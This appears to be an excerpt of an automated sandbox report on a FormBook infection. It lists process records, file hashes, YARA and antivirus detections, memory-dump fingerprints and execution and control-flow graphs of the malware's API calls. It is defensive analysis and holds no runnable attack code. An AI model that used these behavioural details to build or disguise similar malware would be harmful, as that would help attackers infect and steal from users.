                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 66%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:14:20:19
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff67e6d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:14:20:23
                                                          Start date:23/05/2024
                                                          Path:C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe"
                                                          Imagebase:0x930000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:14:20:26
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\SysWOW64\netbtugc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                          Imagebase:0xb0000
                                                          File size:22'016 bytes
                                                          MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:14
                                                          Start time:14:20:39
                                                          Start date:23/05/2024
                                                          Path:C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe"
                                                          Imagebase:0x930000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:15
                                                          Start time:14:20:50
                                                          Start date:23/05/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6d20e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1467717748.00007FFB4A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cf1eb6345cdabd28efb1303380242d6abd81f08f3255e93d2f714b59407bb0d
                                                            • Instruction ID: c4978200aec8f27a03ad79c06cd4385380112e6fd2d5139dae869d0b7948c238
                                                            • Opcode Fuzzy Hash: 6cf1eb6345cdabd28efb1303380242d6abd81f08f3255e93d2f714b59407bb0d
                                                            • Instruction Fuzzy Hash: CE124BA290DBDA0FE796EFB888655B57FE8EF56210B1800FFD488DB093ED189805C351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1467717748.00007FFB4A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @_
                                                            • API String ID: 0-1249120671
                                                            • Opcode ID: 013a5002486868d28d2bff3a2f6dfe2dd1e68a2d0d1d01e28cfc8396be10eaec
                                                            • Instruction ID: 598d63cef88833f9657b81860dd246a113aa3ecf0eb8aa559c28b182906700ac
                                                            • Opcode Fuzzy Hash: 013a5002486868d28d2bff3a2f6dfe2dd1e68a2d0d1d01e28cfc8396be10eaec
                                                            • Instruction Fuzzy Hash: 5DE146B290CB9A4FE7A9EF68C8555A47BE5EF54310B2401FED44DDB192EE28AC418341
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1466795076.00007FFB4A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A270000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a270000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85256bed23985ef6afcb0c7bb5054bc02db254f506c733237af9972c14a9c948
                                                            • Instruction ID: 69ff6001172e9efbf13aa83d9d86460c60c57d427a0092d16520639e4acbfd23
                                                            • Opcode Fuzzy Hash: 85256bed23985ef6afcb0c7bb5054bc02db254f506c733237af9972c14a9c948
                                                            • Instruction Fuzzy Hash: F1122676A0CA5A8FDB45FF6CD491AE97BA0FF54314B2401B6D48CCB192CE24B846DBD0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1466795076.00007FFB4A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A270000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a270000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f8ec0b9d29409e07a46386e4da667fa5726ffc81d6b9a91dc2f0612a2692fc4
                                                            • Instruction ID: fba5f88260b0ed315d6e8bb6ff237c9f8e7524807e55730b5492453ef6b43f46
                                                            • Opcode Fuzzy Hash: 4f8ec0b9d29409e07a46386e4da667fa5726ffc81d6b9a91dc2f0612a2692fc4
                                                            • Instruction Fuzzy Hash: CCF1C770A1CA4D8FDB99EF6CC485AA97BE1FF59300F1441AAD449C7296CA34FC42DB81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1467717748.00007FFB4A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92856e66a31dac6c5635890c1eef0877999571ce934babc5ca2783de2f313833
                                                            • Instruction ID: 8c21d4fed9ddf97fa795a38d58bea58c19bca5f85d4bae604960d9edeefefae9
                                                            • Opcode Fuzzy Hash: 92856e66a31dac6c5635890c1eef0877999571ce934babc5ca2783de2f313833
                                                            • Instruction Fuzzy Hash: 45510992A0EFE60FE3A5AE7C98611B46FE5EF56610B6801FBE488C71D3E8085C058391
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1467717748.00007FFB4A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0fb3c94ad5dc46f552c32a1069021068a28576a8ae2e50512b701ce12a05e5a1
                                                            • Instruction ID: 10983d34349d3c6b63154f64851ebf4061df4809d14d0cd2005d036b1b98f4f5
                                                            • Opcode Fuzzy Hash: 0fb3c94ad5dc46f552c32a1069021068a28576a8ae2e50512b701ce12a05e5a1
                                                            • Instruction Fuzzy Hash: 114148D2E1EA970BF3A9FEB88965174AAC9EF95250B6800FDD44DDB1D3FD0C98045341
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1466795076.00007FFB4A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A270000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ffb4a270000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                            • Instruction ID: 83cc9f8a51bcf334f6baf2aae041de2c2dad756dcf384b8e7201d69d4e6ef5e6
                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                            • Instruction Fuzzy Hash: FF01A77010CB0C8FD744EF0CE051AA6B7E0FB95364F10056DE58AC3691DB32E882CB41

                                                            Execution Graph

                                                            Execution Coverage:1.4%
                                                            Dynamic/Decrypted Code Coverage:5.3%
                                                            Signature Coverage:8.4%
                                                            Total number of Nodes:131
                                                            Total number of Limit Nodes:8
                                                            execution_graph 78204 9b1e0b 78205 9b1e15 78204->78205 78205->78205 78208 9de793 78205->78208 78211 9dcde3 78208->78211 78212 9dce09 78211->78212 78223 9b7603 78212->78223 78214 9dce1f 78215 9b1ec2 78214->78215 78226 9cac93 78214->78226 78217 9dce3e 78218 9dce53 78217->78218 78241 9db703 78217->78241 78237 9d7463 78218->78237 78221 9dce62 78222 9db703 ExitProcess 78221->78222 78222->78215 78244 9c6563 78223->78244 78225 9b7610 78225->78214 78227 9cacbf 78226->78227 78255 9cab83 78227->78255 78230 9cacec 78232 9cacf7 78230->78232 78234 9db363 NtClose 78230->78234 78231 9cad04 78233 9cad20 78231->78233 78235 9db363 NtClose 78231->78235 78232->78217 78233->78217 78234->78232 78236 9cad16 78235->78236 78236->78217 78238 9d74bd 78237->78238 78240 9d74ca 78238->78240 78266 9c8373 78238->78266 78240->78221 78242 9db71d 78241->78242 78243 9db72e ExitProcess 78242->78243 78243->78218 78245 9c657a 78244->78245 78247 9c6590 78245->78247 78248 9dbd93 78245->78248 78247->78225 78249 9dbdab 78248->78249 78250 9dbdcf 78249->78250 78251 9daa13 LdrInitializeThunk 78249->78251 78250->78247 78252 9dbe1e 78251->78252 78253 9dd1f3 RtlFreeHeap 78252->78253 78254 9dbe37 78253->78254 78254->78247 78256 9cab9d 78255->78256 78260 9cac79 78255->78260 78261 9daab3 78256->78261 78259 9db363 NtClose 78259->78260 78260->78230 78260->78231 78262 9daad0 78261->78262 78265 15d35c0 LdrInitializeThunk 78262->78265 78263 9cac6d 78263->78259 78265->78263 78267 9c839d 78266->78267 78273 9c87fb 78267->78273 78274 9c3fb3 78267->78274 78269 9c8498 78270 9dd1f3 RtlFreeHeap 78269->78270 78269->78273 78271 9c84b0 78270->78271 78272 9db703 ExitProcess 78271->78272 78271->78273 78272->78273 78273->78240 78275 9c3fd2 78274->78275 78277 9c40f0 78275->78277 78278 9c3a03 78275->78278 78277->78269 78279 9c3a25 78278->78279 78281 9db5c3 78278->78281 78279->78277 78282 9db5dd 78281->78282 78285 15d2c70 LdrInitializeThunk 78282->78285 78283 9db605 78283->78279 78285->78283 78151 9c89f6 78152 9c89fd 78151->78152 78153 9c8a18 78151->78153 78156 9db363 78153->78156 78155 9c8a22 78157 9db380 78156->78157 78158 9db391 NtClose 78157->78158 78158->78155 78286 15d2b60 LdrInitializeThunk 78159 9de2d3 78160 9de2e9 78159->78160 78161 9de2e3 78159->78161 78164 9dd2d3 78160->78164 78163 9de30f 78167 9db663 78164->78167 78166 9dd2eb 78166->78163 78168 9db680 78167->78168 78169 9db691 RtlAllocateHeap 78168->78169 78169->78166 78170 9d41d3 78171 9d41ef 78170->78171 78172 9d422b 78171->78172 78173 9d4217 78171->78173 78175 9db363 NtClose 78172->78175 78174 9db363 NtClose 78173->78174 78176 9d4220 78174->78176 78177 9d4234 78175->78177 78180 9dd313 RtlAllocateHeap 78177->78180 78179 9d423f 78180->78179 78181 9de333 78184 9dd1f3 78181->78184 78187 9db6b3 78184->78187 78186 9dd209 78188 9db6d0 78187->78188 78189 9db6e1 RtlFreeHeap 78188->78189 78189->78186 78287 9da9c3 78288 9da9e0 78287->78288 78291 15d2df0 LdrInitializeThunk 78288->78291 78289 9daa08 78291->78289 78292 9d4563 78293 9d4572 78292->78293 78294 9d45b6 78293->78294 78297 9d45f4 78293->78297 78299 9d45f9 78293->78299 78295 9dd1f3 RtlFreeHeap 78294->78295 78296 9d45c6 78295->78296 78298 9dd1f3 RtlFreeHeap 78297->78298 78298->78299 78190 9cdf93 78191 9cdfb9 78190->78191 78195 9ce0a7 78191->78195 78196 9de373 RtlAllocateHeap RtlFreeHeap 78191->78196 78193 9ce04b 78193->78195 78197 9daa13 78193->78197 78196->78193 78198 9daa30 78197->78198 78201 15d2c0a 78198->78201 78199 9daa5c 78199->78195 78202 15d2c1f LdrInitializeThunk 78201->78202 78203 15d2c11 78201->78203 78202->78199 78203->78199 78300 9c3e83 78301 9c3e9c 78300->78301 78306 9c7823 78301->78306 78303 9c3eba 78304 9c3f06 78303->78304 78305 9c3ef3 PostThreadMessageW 78303->78305 78305->78304 78307 9c7847 78306->78307 78308 9c784e 78307->78308 78309 9c7893 LdrLoadDll 78307->78309 78308->78303 78309->78308 78310 9cae83 78311 9caec7 78310->78311 78312 9caee8 78311->78312 78313 9db363 NtClose 78311->78313 78313->78312

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 144 9c7823-9c783f 145 9c7847-9c784c 144->145 146 9c7842 call 9ddef3 144->146 147 9c784e-9c7851 145->147 148 9c7852-9c7860 call 9de413 145->148 146->145 151 9c7870-9c7881 call 9dc8b3 148->151 152 9c7862-9c786d call 9de6b3 148->152 157 9c789a-9c789d 151->157 158 9c7883-9c7897 LdrLoadDll 151->158 152->151 158->157
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009C7895
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                                            • Instruction ID: 048f073148566ce930f1bd670ac7fc2c0a8b8533e416cd95f9fc03cb6d966b7d
                                                            • Opcode Fuzzy Hash: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                                            • Instruction Fuzzy Hash: B40125B5D4010DB7DF10EBE4DD86F9DB378AB54304F0081A6EA0897241F671EB14CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 170 9db363-9db39f call 9b4c33 call 9dc3f3 NtClose
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                                            • Instruction ID: fd046de0abba7809b51b982058063fa33e91e500b4e39dbdc9635a878bf955e4
                                                            • Opcode Fuzzy Hash: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                                            • Instruction Fuzzy Hash: 6DE046322006047BD220EA59DC42FEBBBACDFC6720F008416FA48A7242C671BA1087A2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                            • Instruction ID: 4adf2cd3ea3bdca79dca36a60b1f974098add921ac85357bd232ca71505b5a38
                                                            • Opcode Fuzzy Hash: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                            • Instruction Fuzzy Hash: 5D900231A0550402D104725845187061085A7D0211F69C811A0424968DC7D58A5166A2

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 184 15d2b60-15d2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                            • Instruction ID: 7c122859cda5735cfa88d52c7e3190221f5b65acb0d2046d145294b44a1b9722
                                                            • Opcode Fuzzy Hash: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                            • Instruction Fuzzy Hash: DF90026160240003410972584418616408AA7E0211B59C421E1014990DC56589916225

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 186 15d2df0-15d2dfc LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                            • Instruction ID: 77ac7b294673f5818fa2640514454856cf971841be5eca3eeeee6d53ff32a42e
                                                            • Opcode Fuzzy Hash: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                            • Instruction Fuzzy Hash: 2990023160140413D115725845087070089A7D0251F99C812A0424958DD6968A52A221

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 185 15d2c70-15d2c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                            • Instruction ID: 3e29ed3d29b0892d6e8d646bbcd5991538b16a9bd0b63507ac230cab250efbfd
                                                            • Opcode Fuzzy Hash: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                            • Instruction Fuzzy Hash: B190023160148802D1147258840874A0085A7D0311F5DC811A4424A58DC6D589917221

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 53 9c3d55-9c3d62 54 9c3ceb 53->54 55 9c3d64-9c3d7e 53->55 57 9c3d20-9c3d2c 54->57 56 9c3d81-9c3d83 55->56 58 9c3d85-9c3d8e 56->58 59 9c3da0 56->59 57->56 60 9c3d2e-9c3d34 57->60 61 9c3d90-9c3d9c 58->61 62 9c3d43-9c3d47 58->62 63 9c3dca 59->63 64 9c3da2-9c3dac 59->64 65 9c3d35-9c3d3a 60->65 61->59 68 9c3d48-9c3d4f 62->68 67 9c3dcc-9c3de3 63->67 64->65 66 9c3dae-9c3db0 64->66 65->62 69 9c3e3f-9c3e49 67->69 70 9c3de5-9c3dee 67->70 68->68 71 9c3d51 68->71 73 9c3e83-9c3ef1 call 9dd293 call 9ddca3 call 9c7823 call 9b4ba3 call 9d4663 69->73 74 9c3df2-9c3e11 70->74 71->57 72 9c3d53 71->72 72->53 89 9c3f13-9c3f18 73->89 90 9c3ef3-9c3f04 PostThreadMessageW 73->90 74->74 76 9c3e13-9c3e1c 74->76 76->67 78 9c3e1e-9c3e26 76->78 78->73 80 9c3e28-9c3e3d 78->80 80->69 90->89 91 9c3f06-9c3f10 90->91 91->89
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                                            • API String ID: 0-2839762430
                                                            • Opcode ID: 91db4609e8833fd3a820713cf9b5a6a8e9e2ab509916083fac39da9bc8e51783
                                                            • Instruction ID: f519cf334c8ce511787be8110b44037652fe0185b36fa42b2bced648034189cb
                                                            • Opcode Fuzzy Hash: 91db4609e8833fd3a820713cf9b5a6a8e9e2ab509916083fac39da9bc8e51783
                                                            • Instruction Fuzzy Hash: 1F51FC72C446066BEB11DE74C882FDABBB8EB50710F50C65DE542DB287D7308603C786

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 92 9c3e7b-9c3ef1 call 9dd293 call 9ddca3 call 9c7823 call 9b4ba3 call 9d4663 104 9c3f13-9c3f18 92->104 105 9c3ef3-9c3f04 PostThreadMessageW 92->105 105->104 106 9c3f06-9c3f10 105->106 106->104
                                                            APIs
                                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 009C3F00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                                            • API String ID: 1836367815-2839762430
                                                            • Opcode ID: 73385b85b1a12d59d14ba7e5b01e95c766caa6edac8ddb57832a69d99dc255d8
                                                            • Instruction ID: b6f973d7e7605bf0700c5931854d83a28dab390eebe61fce981a9695541a266f
                                                            • Opcode Fuzzy Hash: 73385b85b1a12d59d14ba7e5b01e95c766caa6edac8ddb57832a69d99dc255d8
                                                            • Instruction Fuzzy Hash: D011DF71D4521876EB21AAD49C42FDE7B7C9F81B10F00C159FB047B2C2D6B4970687E5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 107 9c3e83-9c3ef1 call 9dd293 call 9ddca3 call 9c7823 call 9b4ba3 call 9d4663 118 9c3f13-9c3f18 107->118 119 9c3ef3-9c3f04 PostThreadMessageW 107->119 119->118 120 9c3f06-9c3f10 119->120 120->118
                                                            APIs
                                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 009C3F00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                                            • API String ID: 1836367815-2839762430
                                                            • Opcode ID: 2f3ccf5a19ea64df06ba1c4150d40991daeeed6eabb501ca3201f0468e65b513
                                                            • Instruction ID: fde5fd7d20eb8a7d36e1014300a834ad2cc0d9ea9c4e8d71c3eab8dd7a19c5e0
                                                            • Opcode Fuzzy Hash: 2f3ccf5a19ea64df06ba1c4150d40991daeeed6eabb501ca3201f0468e65b513
                                                            • Instruction Fuzzy Hash: 2401D671D4521876EB21AAE09C42FDE7B7C9F81B10F008059FB047B2C1E6B4AB0287E6

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 130 9c78ad-9c78bf 132 9c792d-9c7938 130->132 133 9c78c2-9c78e7 130->133 137 9c793a-9c7955 132->137 138 9c7966 132->138 135 9c78e9-9c78ea 133->135 136 9c792b-9c792c 133->136 139 9c78ec-9c78ed 135->139 140 9c7893-9c7897 LdrLoadDll 135->140 136->132 142 9c78ef-9c78f5 139->142 143 9c7919-9c7928 139->143 141 9c789a-9c789d 140->141 143->136
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009C7895
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
